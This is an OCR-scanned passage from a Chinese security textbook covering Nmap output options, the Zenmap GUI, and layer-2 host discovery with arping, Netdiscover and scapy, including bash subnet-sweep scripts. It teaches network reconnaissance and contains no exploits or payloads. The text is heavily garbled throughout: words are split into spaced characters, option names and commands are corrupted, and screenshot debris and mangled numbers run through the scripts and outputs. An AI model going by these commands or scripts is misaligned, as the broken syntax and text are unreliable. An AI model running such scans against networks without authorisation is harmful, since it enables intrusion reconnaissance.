于 阅读 ， 可 以 使 用 输出 项 中 的 一 些 参数 指 
定 输出 成 不 同 格式 的 文件 。Nmap 提 供 了 方 
便 直接 查看 的 交互 式 方式 和 方便 软件 处 理 
的 XML 格式 ， 另 外 还 提供 了 选项 来 控制 输 
出 的 细节 以 及 调试 信息 。 
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五 种 不 同 的 输出 格式 如 下 : 
(1) interactive output。 交互 式 输出 ， 
默认 的 输出 方式 。 

(2) normal output。 
间 信 息 和 告警 信息 。 

(3) XML output。 可 转换 成 HTML, 方 
便 程 序 处 理 。 

(4) grepable output。 
标 主机 最 多 的 信息 。 

(5) sCRiPt KiDDi3 output 格式 。 
本 的 形式 输出 。 

下 图 为 输出 项 的 帮助 信息 。 


显示 较 少 的 运行 时 


在 一 行 中 包含 目 


以 脚 


由 
on 后 全 i Output genni Hora 


1L，XML，s|<rIpt kIddi3, 
.enane. 


参数 说 明 如 下 ; 

e -oN <file>: 标准 输出 。 

e -oX <file>: XML 输出 写 入 指定 的 
文件 。 

e -0S <file>: 类 似 于 交互 工具 输出 。 

e -oG <file>: Grepable 输 出 。 

e -oA <basename>: 输出 至 所 有 

格式 。 

。 -v: 提高 输出 信息 的 详细 度 。 

。 -d: 提高 或 设置 调试 级 别 ，9 级 最 高 。 

e --packet-trace: 跟踪 发 送 和 接收 的 
报 文 。 

e --iflist: 输出 检测 到 的 接口 列表 和 系 
统 路 由 。 

e --append-output: 表示 在 输出 文件 中 
添加 ， 而 不 是 覆盖 原文 件 。 

e --Iesume <filename>: 继续 中 断 的 
扫描 。 

e@ --stylesheet <path or URL>: 设置 
XSL 样 式 表 ， 和 转换 XML 输 出 到 
HTML。 在 Web 浏 览 器 中 打开 Nmap 
的 XML 输出 时 ， 将 会 在 文件 系统 中 
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寻找 Nmap.xsl 文 件 ， 并 使 用 它 输出 
结果 。 

e@ --no-stylesheet: 防止 将 XSL 样 式 表 
与 wWXML 输 出 关联 起 来 。 


10.1.9 ”其 他 选项 帮助 信息 


这 里 包括 了 一 些 不 太 明确 分 类 的 其 他 
选项 ， 以 及 一 些 杂 项 。 下 图 为 这 些 选 项 的 
帮助 信息 。 


-hz Print this help summary page 


参数 说 明 如 下 : 

e -6: 开启 IPv6 扫 描 。 

e -A: 激烈 扫描 模式 选项 ， 这 个 选项 
启用 额外 的 高 级 和 高 强度 选项 ， 这 
个 选项 启用 了 操作 系统 检测 〈-O) 
和 版 本 扫描 (-sV) ， 相 当 于 以 下 扫 
描 的 组 合 。 

e --datadir <dimame>: 说 明 用 户 Nmap 
数据 文件 位 置 。Nmap 在 运行 时 从 
文件 中 获得 特殊 的 数据 ， 这 些 文 
件 有 Nmap-service-probes，Nmap- 
services, Nmap-protocols, Nmap- 
Ipc，Nmap-mac-prefixes 和 Nmap-os- 
fingerprints。Nmap 首 先 在 --datadir 
选项 说 明 的 目录 中 查找 这 些 文件 。 
未 找到 的 文件 ， 将 在 BMAPDIR 环 
境 变 量 说 明 的 目录 中 查找 。 接 下 来 
是 用 于 真正 和 有 效 UID 的 ~/.Nmap 
或 Nmap 可 执行 代码 的 位 置 〈 仅 
Windows32) ; 然后 是 编译 位 置 ， 
如 /usr/local/share/Nmap 或 /usr/share/ 
Nmap。Nmap 查 找 的 最 后 一 个 位 置 
是 当前 目录 。 

e --send-eth: 使 用 原 以 太 网 帧 发 送 。 

e --send-ip: 在 原 人 P 层 发 送 。 

e --privileged: 假定 用 户 具 有 全 部 
权限 。 


e --interactive: 在 交互 模式 下 启动 。 

e -V: 打印 版 本 信息 ， 也 可 表示 为 
--Version。 

e -h: 打印 一 个 短 的 帮助 屏幕 ， 也 可 
表示 为 -help。 


10.1.10 Nmap 图 形 模 式 


最 后 使 用 Zenmap 命 令 ， 可 以 开启 Nmap 
图 形 模式 。 其 中 包含 多 种 扫描 选项 ， 它 对 
网 络 中 被 检测 到 的 主机 按照 选择 的 扫描 选 
项 和 显示 结 点 进行 探查 。 用 户 可 以 建立 一 
个 需要 扫描 的 范围 ， 这 样 就 不 需要 再 输入 
大 量 的 IP 地 址 和 主机 名 了 。 

使 用 Nmap 图 形 模式 进行 扫描 的 具体 操 
作 方 法 如 下 : 
[se 加 打开 Nmap 图 形 操作 界面 ， 如 下 图 
所 示 。 


他 Tenmap - 0 x 
反手 四 “工具 四 配置) Why 
Eie Be Intence scan 相国 | 兢 


人 M$: |nmap -T4 -A 


玫 大 | Nmapt 0/ 拓 半 二 加 扫 重 
运作 % 纺 4 主 册 。 “ a 


这 主机 


[Sep 图 要 扫描 单 台 主 机 ， 可 以 在 “目标 ”后 
的 文本 框 内 输入 主机 的 IP 地 址 或 网 址 ; 要 扫 
描 某 个 范围 内 的 主机 ， 可 以 在 该 文本 框 中 
输入 192.168.0.1-150， 如 下 图 所 示 。 


全 Tenmap - 0 x 


3 IAD Ra) WD 
目标 |192168.01-15q| Me: Imence scan EE 
全 和 [nmap -T4 -A 192.1680.1-150 
2 L Nmap 转 出 芒 D/ 主 名 拓扑 主轴 则 是 扫 拓 
二 人 于 的 4 主机 3 
EE 
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侈 提 示 : 在 扫描 时 ， 还 可 以 用 “*#?” 替 换 掉 
IP 地 址 中 的 任何 一 部 分 ， 如 “192.168.1.*” 
等 同 于 “192.168.1.1-255”; 要 扫描 一 个 更 
大 范围 内 的 主机 ， 可 以 输入 “192.168.1， 
2，3.*”， 此 时 将 扫描 “192.168.1.0”“19 
2.168.2.0”“192.168.3.0” 三 个 网 络 中 的 所 
有 地 址 。 


[step 图 有 要 设 置 网 络 扫描 的 不 同 配置 文件 ， 
可 以 单 击 “ 配 置 ”后 的 下 拉 列 表 框 ， 从 中 
选择 Intense scan、Intense scan plus UDP 和 
Intense scan,all TCP ports 等 选项 ， 从 而 对 网 
络 主机 进行 不 同方 面 的 扫描 ， 如 下 图 所 示 。 


二 Zermap 

#59) 工具 0 EP) WAH) 

EF |192.1680.1-150 Ee: | Irtense scai EE 

会 令 :|nmap -T4 -Av 192.168.0.1-150 Intense sean k 
Intence scan pluc UDP 

| ep [WEVA , all TCp perts 

组 系统 4 三 机 i 颈 
Ping sean 
Slow comprehensve scan 

过 壤 主 机 
step 较 单 击 “ 扫 描 ” 按 钮 开始 扫描 ， 稍 等 一 


会 儿 ， 即 可 在 “Nmap 输出 ”选项 卡 中 显示 
扫描 信息 ， 在 扫描 结果 信息 中 ， 可 以 看 到 打 
描 对 象 当前 开放 的 端口 信息 ， 如 下 图 所 示 。 


st) 工具 站 BD SH) 


B19216801-150 可 Be intense sxcon 


BO mmap T4 Av1S215601-150 


EE 


Nmep 办 二 这 DCy/ 主 8 和 5 主机 国有 后 


dE 1 


in 7.935 (2 hosts 


(1 host 


st 192.168, 


.96s elapsed (3008 total 


step 图 选择 “端口 /主机 ”选项 卡 ， 在 打开 


的 界面 中 可 以 看 到 当前 主机 显示 的 端口 、 
协议 、 状 态 和 服务 信息 ， 如 下 图 所 示 。 
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后 zenmap 
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面 中 可 以 查看 当前 网 络 中 计算 机 的 拓扑 结 
构 ， 如 下 图 所 示 。 


他 zenmap 


- DO x 
sla) IRD BP) NW) 
Bm 19216801-150 -Bintense con 习 加 国 
WhO; nmep -T4 A v19216580.1-150 
ET 
fem + = a | Fisheye BADE Legend TER 
口 926801 


有 1924168010u 
有。 1921680106 
有 1 喝 1680112 


[= 


[ep 单 击 “查看 主机 信息 ”按钮 ， 打 开 
“查看 主机 信息 ”窗口 ， 在 其 中 可 以 查看 
当前 主机 的 一 般 信息 、 操 作 系统 信息 等 ， 
如 下 图 所 示 。 


小 二 看 主机 信息 


Hosts 时 规 县 关 路 下放 辽 


192.168.0106 
192.168.0412 


地 址 [pval 192.15801 
192.168.0104 


时 后 动 。Wed Aug 02 03:4245 2017 [11555772)。 
日 的 作 系 统 
己 使 用 端口: 30/tcp open ~ 


EE 尖 B: 革 交 


IOE3 
08 Cancn imageRUNNER CS135 printer 


是 遍 列 


step 图 在 “查看 主机 信息 ”窗口 中 选择 “ 服 
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- 5 “| 务 ” 选 项 卡 ， 可 以 查看 当前 主机 的 服务 信 
3s) 县 中 ” 配 要 中 帮 W) a " a be 
本 1216001150 天 二 二 习 国 国 | 息 ， 如 端口 、 协 议 、 状 态 等 ， 如 下 图 所 示 。 
BO mep TH A vig216601 150 J > 

ET en) > a 
~ EB Fe Te 

DO 192.46804 Sp 1sz16aa1 

e216a0104 | 图 1s00 tp cpm uprp Te21680106 

有 。 192.1680.106 1921680112 皇 D 《 思议 ， 状 态 ， 服务 4 方法 

下 11680112 i 日 8 tp open hap probed 

900 wep apen upnp table 
[4 

step 国 选择 “拓扑 ”选项 卡 ， 在 打开 的 界 


[step 图 选择 “路 由 追踪 ”选项 卡 ， 在 打开 的 
界面 中 可 以 查看 当前 主机 的 路 由 器 信息 ， 
如 下 图 所 示 。 


一 三 HE 四 
Hoests 1 
16216801 

1921680.106 
1921680112 
1921680.104 


<b>/<b> 舞 吕 昭 由 过 周全 息 共 <b>1<b> 交 P09 


在 Nmap 操 作 界面 中 选择 “主机 明 
细 ” 选 项 卡 ， 在 打开 的 界面 中 可 以 查看 当 
前 主机 的 明细 信息 ， 包 括 主机 状态 、 地 址 
列表 、 操 作 系 统 等 ， 如 下 图 所 示 。 


Zermep 


-0 X 
Ss) IaD Bm Be 
Em 1921680.1-150 二 | 配对 ”Intcnsc xcan | (Esl EB 
:mep 14 v19215801-150 
3 服务 INmap 输 出 控 中 /主机 拓扑 主机 角 细 失 奖 
feet sm + 
D19216801 FP 
216a0104 WE 
4 19216a0106 Fn: 2 口 
a 192.1680112 ME 
TD 0 
ES 
ci 1155577 是 
SS Wed aug 02 034245 2017 
a 
I 19216301 
me 
NAb FaacDaao73 
i 生息 。 CaranimageRUNNER C5185 prirter 


10.2 ”二 层 扫描 


数据 链 路 层 的 数据 单位 为 帧 ， 主 要 分 
为 : 逻辑 链 路 控制 (LLC) 和 介质 访问 控 
制 (MAC) ， 其 中 主要 的 协议 是 ARP (Ad- 
dress Resolution Protocol， 地 址 解析 协议 ) 
协议 ， 它 将 32 位 JP 地址 解析 为 48 位 以 太 网 
地 址 ， 需 要 注意 的 是 ，ARP 协 议 对 应 二 层 
广播 包 ， 而 广播 包 是 无 法 通过 路 由 或 网 关 
访问 外 部 地 址 的 。 


10.2.1 使 用 arping 命 令 


使 用 arping 命 令 向 局 域 网 内 的 其 他 主机 
发 送 ARP 请 求 的 指令 ， 可 以 用 来 测试 局 域 
网 内 的 某 个 IP 是 否 已 被 使 用 ， 其 中 被 使 用 的 
卫 地 址 为 在 线 主机 。 命 令 格式 如 下 : 


arping [-RAbDfhqUV] [-c count] [-w 
deadline] [-s source] [-I interfacel] 


参数 说 明 如 下 : 
-A: ARP 回 复 模式 ， 更 新 邻居 。 
-b: 保持 广播 。 
-D: 复制 地 址 检测 模式 。 
-f: 得 到 第 一 个 回复 就 退出 。 
-q: 不 显示 警告 信息 。 
-U: 主动 的 ARP 模 式 ， 更 新 邻居 。 

pa 

: 发 送 的 数据 包 的 数目 。 
e -w: 设置 超时 时 间 。 
e -I: 使 用 指定 的 以 太 网 设备 ， 默 认 
情况 下 使 用 eth0。 

e -s: 指定 源 IP 地 址 。 

e -h: 显示 帮助 信息 。 

e -V: 显示 版 本 信息 。 

使 用 arpping 命 令 查询 IP 地 址 或 MAC 地 
址 的 操作 步骤 如 下 : 
[step 图 查看 某 个 IP 地 址 的 MAC 地 址 ， 使 用 
arping 192.168.1.1 命 令 ， 执 行 效果 如 下 图 所 
示 。 如 果 数 据 包 正确 返回 ， 则 都 会 包含 一 
个 bytes form 字 段 。 
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FooTekatI F arping T92168-1-T 
ARPING 192.168.1.1 

50 bytes from lc:fa:68:61:2f:98 (192.168.1.1): index=0 time=272.866 usec 
50 bytes from lc:fa:68:61:2f:98 (192.168.1.1): index=1 time=947.757 Usec 
Flytes Fron GE 99:27100 A192, 60: XD ndens2! en 457 Has 


上 -- 192.166.1.1 statistics --- 
B packets transnitted, 3 packets received, 0% unanswered (9 extra) 
tt min/avg/wax/std-dev = 0.273/0.893/1.457/0.485 ms 


[step 图 在 查询 某 个 IP 地 址 的 MAC 地 址 时 ， 
如 果 想 在 发 送 ARP 数 据 包 的 过 程 中 ， 指 
定 ARP 数 据 包 的 数量 ， 可 以 使 用 arping 一 
c 1 192.168.1.1 命 令 ， 执 行 效果 如 下 图 
所 示 。 


FrootBkaUi:-# arping -c2 192.168.1.1 

ARPING 192.168.1.1 

50 bytes from 1c:fa:68:61;2f:68 [192.168.1.1); index=0 time=1.265 msec 

60 bytes from 1c:fo:58:01:21:08 (192.168.1.1): index=1 time=340.555 Usec 
192.168.1,1 statistics 

2 packets transnitted, 2 packets receivt 9 unanswered (9 extra) 

rt sin/ava0max/std dey «9°34170 80371 ss 462 ms 


当 有 多 块 网 卡 时 ， 需 要 指定 特定 的 设 
备 来 发 送 ARP 数 据 包 ， 这 时 需要 使 用 arping 
-eth0 -c 1 192.168.1.1 命 令 ， 执 行 效果 如 下 
图 所 示 。 


Oot arping -1 ethg ecTT92166 TT 

ARPING 132.168.1.1 

|6e bytes from 1c:f9:68:01:21:68 (192,168,1.1); index=0 time=939,.699 usec 
--- 192.168.1.1 statistics --- 

1 packets transnitted, 1 pacxets received, gx unanswered (9 extral 

rtt min/avg/max/std-dev = ©.931/0.931/0.931/0,60 Ms 


查看 某 个 IP 是 否 被 不 同 的 MAC 占 
用 ， 这 时 可 以 使 用 arping -d 192.168.1.15 命 
令 ， 执 行 效 果 如 下 图 所 示 。 如 果 存 在 被 不 
同 MAC 占 用 的 情况 ， 则 有 可 能 是 ARP 地 址 
欺骗 。 


Faateparir-z SrPIN9 -0 IT92-T68-T-TS 
ARPING 192.168.1.15 

Timeout 

Timeout 

Timeout 


-~- 192.168.1.15 statistics --- 
BB packets transnitted, © pacxets received, 190% unanswered (9 extra) 


[step 图 查看 某 个 MAC 地 址 的 人 P 地 址 ， 需 要 在 
同一 子 网 中 才能 查 到 ， 这 时 需要 使 用 arping 
一 c 100-25-22-F9-5F-44 命 令 ， 执 行 效果 如 下 
图 所 示 。 


packets received, 109% unanswered (9 extra) 


= 器 确定 MAC 和 IP 的 对 应 情况 ,使 用 
arping -c 1-T 192.168.1.100 00-25-22-F9- 
SF-44 命 令 ， 执 行 效果 如 下 图 所 示 。 
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ootBRatis- arping -c 1 -T 192.168.1.100 60-25-22-F9-5F-44 
ING 99-25-22-F9-5F- 44 

imeout 

-- 98-25-22-F9-5F-44 statistics -- 


packets transmitted，6 packets received，166& unanswered (9 extra) 


"("-f 2|eut -d")"-f 1 命令 ， 执 行 效果 如 下 图 
所 示 。 


侈 提示 : 如 果 想 要 确定 IP 和 MAC 对 应 情 
况 ， 可 以 使 用 arping -c 1-t 00:13:72:f9:ca:60 
192.168.1.15 命 令 来 确定 。 


Bes 国 有 时 ， 本 地 查 不 到 某 主 机 ， 可 以 
让 网 关 或 其 他 机 器 去 查 。 这 时 使 用 arping 
-c 1-S 10.240.160.1 -s 88:5a:92:12:c1: 
c110.240.162.115 命 令 或 者 arping-c 1-S 
10.240.160.110.240.162.115 命 令 都 可 以 ， 执 
行 效果 如 下 图 所 示 。 


[aatBRRGES arping CT -5 T0240 150 1 -5 B85ar92rlrcLrcl I-262 TI 
arping: lookup dev: No matching interiace found using getifaddrs() 

larping: Unable to autonatically find interface to use, Is it on the local LAN? 
larping: use -1 to manuatty specify interface. Guessing interface ethe， 

ARPING 10.240.162.115 

imeout 


19.240.162.115 statistics --- 
1 packets transmitted, © packets received, 190% unanswered (9 extra) 


通过 Wireshark 工 具 抓 取 ARP 数 据 包 ， 
其 中 二 层 以 太 网 信息 如 下 图 所 示 ， 其 中 包 
括 目标 地 址 与 源 地 址 ， 可 以 看 出 目标 地 址 
为 广播 地 址 。 


TTT (O00 TTI SC EGGCaSC (THTTTT TT ITT TT 
sdcast (FT: fr: Ff:fF :ff) 


Souroe: 人 196 (000c:29:39: 72:90) 
yoo hey 6) 
raller; 00000000000000ondod eeeeen0000 


Estee 图 使 用 Wireshark 工 具 探测 到 的 ARP 协 
议 ， 其 具体 数据 如 下 图 所 示 。 


FAddress Resolution Protocol (request) 
Hardware type: Ethernet (1) 
Protocol type: IPv4 (9xe899) 
Hardware size: 6 
Protocol size: 4 
Opcode: request (1) 
Sender MAC address: Vmware_39:f2:9c (90:0c:29:39:f2:9c) 
Sender IP address: 192.168.1.191 
Target MAC address: 69:96:99_ 69:09:99 (969:699:09:96:99:99) 
Target IP address: 192.168.1.1 


step 圈 当 目 标 地 址 存在 即 会 返回 MAC 地 
址 ， 如 果 不 存 在 则 不 会 返回 。 返 回 的 ARP 
响应 数据 包 如 下 图 所 示 ， 这 就 是 对 探测 数 
据 包 进行 的 回应 。 
FAddress Resolution Protocol (reply) 

Hardware type: Ethernet (1) 

Protocol type: IPv4 (6x9899) 

Hardware size: 6 

Protocol size: 4 

Opcode: reply (2) 

Sender MAC address: Tp-LinkT_61:2f:98 (1lc:fa:68:91:2f:98) 

Sender IP address: 192.168.1.1 


Target MAC address: Vmware_39:f2:9c (99:gc:29:39:f2:9c) 
Target IP address: 192.168.1.191 


step 国 使 用 管道 第 选 可 以 截取 出 存在 主机 
i 这 时 使 用 arping -c 1 192.168. 
1.1|grep"bytes from"|cut -d" " -f Slcut -d 
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root@kali:-# arping -c 1 192.168.1.1lgrep YEes from"[ 
cut -d" " -f 5lcut -d"(" -f 2|cut -d")" -f 


192.168.1.1 


参数 说 明 如 下 : 
® grep “bytes from” 
主机 。 
® cut-d“” 7 ki 
截取 第 五 行 
@ cut-d“(” 
"(" 插 号 。 
® cut -d4“)”- 
")" 括 号 。 
除 上 述 介绍 的 内 容 外 ， 用 户 还 可 以 使 
用 shell 脚 本 来 实现 自动 化 扫描 ， 下 面 是 脚本 
文件 ， 该 脚本 遍历 eth0 网 卡 的 整个 网 段 ， 具 
体 代码 如 下 : 


: 是 截取 存活 


信息 。 


2: 去 除 耳 地 址 前 面 的 


1: 去 除了 地 址 后 面 的 


#!/bin/bash # 使 用 哪 种 脚本 进行 解释 固定 
格式 ,这 里 用 的 是 Bshel1 

if [ "$#" -ne 1 ]; then # 参 数 不 等 于 1 
给 出 提示 信息 


echo "Usage - ./arping.sh [interface]" 

echo "Excample - ./arping.sh eth0" 

echo "Example will perform an RARP 
scan of the local subnet to which eth0 
is assigned" 


exit 

ff 

interface=$1 # 第 一 个 参数 赋 给 
interface 变 量 

# 取 出 网 卡 信息 中 的 IP 地 址 

prefix=$ (ifconfig S$interface | grep 


einet tout =0 "tC =f 2lent = =E 1=3) 

for addr in $(seq 1 254);do # 定 义 一 个 
adqdr 变 量 取 值 为 一 个 序列 遍历 整个 网 段 

# 将 IP 地 址 组 装 发 出 arping 包 

arping -c 1 $prefix.$addr | grep 
POMEBST Ut 
= 2 cat = "Y= 

done 


还 可 以 编写 用 于 读 取 文 本 的 脚本 ， 该 
脚本 可 以 读 取 指定 文件 ， 并 扫描 文件 中 给 
定 的 耳 地 址 ， 具 体 代码 如 下 : 


#!/bin/bash 
ES | We a I 


echo "Usage - ./arping.sh [interface]" 
echo "Excample - ./arping.sh file" 
echo "Example will perform an RARP 
scan of the local subnet to which eth0 
is assigned" 

exit 

fi file=$1 

for addr in $(cat $file);do # 读 取 指 定 文件 

arping -CC 1 $addr | grep "bytes 
| | ey a Bh 二 2 
Uab = EL 

done 


侈 注意 : 执行 脚本 前 需 先 修改 脚本 文件 的 
执行 权限 ， 如 果 没 有 执行 权限 会 报错 ， 这 
里 可 以 通过 chmod 755 < 脚本 名 称 > 命令 来 使 
脚本 具有 可 执行 权限 。 


10.2.2 ”使 用 工具 扫描 


在 二 层 扫描 中 ， 用 户 可 以 使 用 工具 
来 扫描 ， 下 面 介绍 三 个 扫描 工具 的 具体 应 
用 ， 分 别 是 Nmap、Netdiscover 和 scapy。 


1. Nmap 工 具 


这 里 只 讲解 Nmap 在 二 层 扫 描 的 应 用 ， 
Nmap 有 很 多 相应 的 参数 ， 不 过 ， 在 二 层 扫 
描 中 Nmap 不 做 端口 扫描 ， 下 面 介绍 Nmap 扫 
描 工 具 在 二 层 扫 描 中 的 具体 应 用 。 

[step 图 探测 主机 是 否 存在 ， 这 时 可 以 使 用 
Namp -sn 192.168.1.1 命 令 ， 执 行 效果 如 下 
图 所 示 。 


FaataRaUI5=7TESE728 nnap -sn 192.168.1.L 

Sort Nmap 7.79 ( https://nmap.org ) at 2918-16-23 64:44 EDT 
map scan report for 192.168.1.1 

Host is up (9.99654s latency! 

IAC Address: 1C:FA:68:91:2F:98 (Tp-link Technologies) 

Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds 


[step 图 网 段 扫 描 ， 使 用 Nmap -sn 192. 168. 
1.1-254 命 令 或 者 Nmap -sn 192.168.1.0/24 
命令 可 以 进行 网 段 扫 描 ， 执 行 效果 如 下 图 
所 示 。 


pee -Sn 192.158.1.1-254 

Starting Nmap 7.79 ( https://nnap.org ) at 2918-19-23 64:47 EDT 
map scan report for 192.168.1.1 

ost is up. 

IAC Address: 1C:FA:68:61:2F:68 (Tp-link Technologies) 

map scan report for 192.168.1.199 

lost is up (9.99922s latency|. 

IAC Address; 99:25:22:F9:5F:44 (ASRock Incorporation) 

map scan report for 192.168.1.191 

es is up. 

Nmap done: 254 IP addresses |3 hosts up) scanned in 7.91 seconds 
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侈 提 示 : 在 扫描 过 程 中 ， 用 户 可 以 发 现 使 
用 Nmap 扫 描 要 比 使 用 arping 脚 本 快 得 多 ， 
而 且 还 会 扫描 出 更 多 的 信息 ， 如 网 卡 型 
号 、 主 机 延迟 等 。 


step 图 读 取 文 件 ， 并 根据 文件 中 给 定 的 地 址 
进行 扫描 ， 使 用 Nmap -iL addr -sn 命令 ， 执 
行 效果 如 下 图 所 示 。 


FFoot@rali: /Test/2# nmap -iL addr -sn 

Starting Nmap 7.79 ( https://nnap.org ) at 2918-19-23 64:57 EDT 
Nmap scan report for 192.168.1.1 

Host is up (6.696825 latency). 

MAC Address: 1C:FA:68:61:2F:98 (Tp-link Technologies) 

Nmap scan report for 192.168.1.190 

Host is up (9.696155 latency). 

MAC Address: 90:25:22:F9:5F:44 (ASRock Incorporation) 

Nmap scan report for 192.168.1.191 

Host is up. 

Nmap done: 4 IP addresses (3 hosts up) scanned in 0.33 seconds 


2. Netdiscover 工 具 


Netdiscover 是 一 个 ARP 侦 查 工具 ， 可 用 
于 无 线 网 络 环 境 。 该 工具 在 不 使 用 DHCP 的 
无 线 网 络 上 非常 有 用 。 使 用 Netdiscover 工 具 
可 以 在 网 络 上 扫描 IP 地 址 ， 并 检查 在 线 主 机 
或 搜索 为 主机 发 送 的 ARP 请 求 。 

具体 操作 步 又 如 下 : 
主动 扫描 ， 这 时 使 用 netdiscover -i 
eth0 -r 192.168.1.1/24 命 令 ， 其 中 -i 是 指定 网 
卡 ，-I 是 指定 网 络 地 址 段 ， 执 行 效果 如 下 图 
所 示 。 


EUrraNEU Seanning FINISREHT | Screon VIews UNIGUS ROSES 


2 Captured ARP Req/Rep packets，fron 2 hosts. Total size: 120 


192.168.1.1 


1c:18:68:01:2f:08 
192-168-1-199 25:22:f9:5f:44 1 


68 TP-LINK TECHNOLOGIES C0, ,LTD. 
68 _ Asrock Incorporation 


读 取 一 个 文件 并 扫描 文件 中 给 定 的 IP 
地 址 段 ， 这 时 使 用 netdiscover -i ech0 -1 add. 
txt 命 令 ， 执 行 效果 如 下 图 所 示 。 


Far 


Seanning Finishedr | Screen View: Unique Hosts 


11 Captured APP Req/Rep packets, from 3 hosts. Total size: 668 


RE PAC Raress mt en WAC Vendor 7 Hosthane 


5 ”390 Tp-LINK TECHMOLOGIES C0.,LTD. 
5 300 AsRock Incorporation 
H 


182 des6d:cd:66:fe:cb “68 -GUANGDONG OPPO HOBILE TELECOMMUNL 


[step 图 被 动 扫 描 ， 使 用 netdiscover -i 
ech0 -p 命 令 ， 此 时 会 进入 被 动 模式 
(passive) ， 并 扫描 出 当前 在 线 主机 ， 执 
行 效果 如 下 图 所 示 。 
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DTTENEI Scanning: (passive) | Screen View: Unique Hosts 


6 Captured ARP Req/Rep packets, fron 2 hosts. Total size: 369 


3 AT WC Aldress Count Len MAC Vendor / Mostnane 
192,168.1.199 。 99:25:223T9:5f:44 2 120 ASRock Incorporation 
192 168.1 1。 1c:fa:6 4 348 TP-LINK TECHNOLOGIES co_，,LTD 


移 注 意 : 使 用 主动 扫描 可 能 会 引起 主机 报 
警 ， 此 时 可 以 采用 被 动 扫描 ， 被 动 扫描 不 
主动 发 送 ARP 数 据 包 ， 而 是 将 网 卡 置 入 混 
杂 模 式 收集 网 络 中 的 数据 包 从 而 发 现 网 络 
中 的 主机 。 


3. scapy 工 具 


scapy 可 以 作为 python 库 进行 调用 ， 当 
然 也 可 以 单独 作为 工具 使 用 ， 它 可 以 实现 
抓 包 、 分 析 、 创 建 、 修 改 、 注 入 网 络 流量 
等 功能 。 

使 用 的 具体 操作 步骤 如 下 : 
[step 图 在 Kali Linux 运 行 界 面 中 执行 scapy 命 
令 ， 即 可 进入 scapy 主 界面 ， 如 下 图 所 示 。 
目前 使 用 的 最 新 版 本 为 5.8.0。 


DoTOKalI -# Scop 
ARNING: NO route found for 1pv6 destination 


: (no defautt route?) 


nSPY//YASn 
apyyyy EW// /71/1 Yen 
3Y/VAAAAAYSPCS sepeY/ /Pp 

nyp nyyyyyyyScP//Pp 

AYASAYYYYYYYY/ /Ps Ey//s 


| Welcone to Scapy 
Version 2.4.0 


1 
| herps 


PCCCCY/1P essps y//Y ‘github. con/secdev/scapy 
sppPP// /a pP///MCIY | 
ye 
AAA sea | 
P////YCpe AAA | craft se if you can 
sceeccp///psP///p | TPv6 layer 
YL/111Y ma sup 1 
cayCyayp/ /Ya py/Ya 
3Y/PsY/// /Ye ac//Yp 


sccaCY//PCypaapyCPA/YSs 
SpEPY//// /NPSpS 


using Tpython 5.8.0 


| 

[step 图 初次 使 用 可 能 会 有 一 个 警告 WARNING: 
No route found for IPv6 destination :: (no 
default route?) 命 令 ， 这 是 由 于 缺少 gnuplot 
支持 。 这 时 ， 可 以 使 用 apt-get install python- 
gnuplot 命 令 来 安装 该 软件 ， 执 行 效果 如 下 
图 所 示 。 


GatHRSUIICI abt- get Instatl PyUon-gnuptot 
在 读 到 软件 包 列表 ... 完成 


在 读 取 状态 信息 -. 。 训 成 

列 软件 外 是 自动 安装 的 并 且 现 在 不 需要 了 

Tibx255-150 python-backports.ssl-natch-hostnane python-beautifulsoup 
ey- arinal.table Toby -emieode display-width 

用 'apt autoremove' 来 着 款 它 (它们 


投了 8 个 钦 件 包 , 新 安装 了 1 个 软件 包 ， 委 到 新 9 个 软件 包 , 有 5 个 软件 包 末 福 升级 - 
要 下 载 83.4 kB 的 归档 
压 申 后 会 消 夸 697 k8 的 病 外 宇 间 。 


step 图 在 scapy 工 具 中 ， 使 用 ARP().display() 
Se ， 可 以 显示 出 ARP 数 据 包 的 头 结构 ， 
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如 下 图 所 示 。 其 中 ARP() 是 一 个 函数 ， 
displayO 属 于 ARPO 的 一 个 子 函 数 。 


p>> ARP() .disptay() 

###[ ARP ]### 
hwtype= 9x1 
ptype= 6x869 
hwlen= 6 
plen= 4 
op= who-has 
hwsrc= 060:0c:29:39:f2:9c 
psrc= 192.168.1.101 
hwdst= 90:99:90:00:09:09 
pdst= 9.0.0.0 


侈 提示 : 通常 ，ARPO 在 使 用 时 可 以 先 定义 
一 个 变量 ， 然 后 用 ARP() 为 其 赋值 ， 一 旦 赋 
值 完成 ， 变 量 便 具有 ARP() 的 功能 ， 例 如 : 
arp=ARPO0， 定 义 变量 ap 并 赋值 。 
构建 查询 数据 包 ， 使 用 arp. 
pdst="192.168.1.1" 命 令 ， 构 建 一 个 查询 
192.168.1.1 的 数据 包 ， 执 行 arp.display() 命 
令 ， 执 行 效果 如 下 图 所 示 。 可 以 看 到 pdst 字 
段 已 经 被 修改 。 

>>> arp=ARP() 
arp.pdst="192.168.1.1" 
arp.display() 
a#[ ARP ]### 


hwtype= 9x1 
ptype= 9x890 


hwlen= 6 

plen= 4 

op= who-has 

hwsrc= 00:0c:29:39:f2:9c 

psrc= 192.168.1.101 

hwdst= 9099:99:99:99:996:09 

pdst= 192.168.1.1 
[Eee 图 发 送 构建 的 数据 包 ， 构 建 完 数据 包 
后 ， 可 以 使 用 sr10 将 数据 包 发 送出 去 ， 执 行 
srl(arp) 命 令 ， 执 行 效 果 如 下 图 所 示 。 发 送 
数据 包 后 可 以 看 到 应 答 数 据 包 信息 ， 其 中 
op 字段 将 变 成 is-at 应 答 ， 源 地 址 目的 地 址 信 
息 也 会 改变 。 


== sri{arp) 
lBegin emission: 
.*Finished sending 1 packets. 


Received 3 packets, got 1 answers, renaining 8 packets 

[eARp hwtype=0x1 ptype=ex899 hvlen=6 plen=4 op=is-at hwsrc=lc:fa:68:0 
8 9:39:f2:9C pdst=192,168.1.101 

‘96\ X00\x00\ xO0\ X00\x60\ OA\ KO0N A00\ 


[Step 图 查询 返回 数据 包 信息 。 当 发 送 完 数据 
包 后 ， 会 返回 一 定 的 数据 ， 这 个 返回 的 数 
据 可 以 作为 信息 赋值 给 一 个 变量 ， 例 如 : 
answer=sr1(arp)。 通 过 使 用 answer.display() 
命令 ， 可 以 查看 返回 数据 包 的 信息 ， 执 行 


效果 如 下 图 所 示 。 


p>> answer.display() 
大 [ ARP ]### 
hwtype= 9x1 
ptype= 9x869 
hwlen= 6 
plen= 4 
op= is-at 
hwsrc= 1c:fa:68:01:2f:08 
psrc= 192.168.1.1 
hwdst= 00:0c:29:39:f2:9c 
pdst= 192.168.1.1691 
##[ Padding ]### 
| load= '\x99\x99\x99\x99\Xx99Nx99\Xx99NX9 
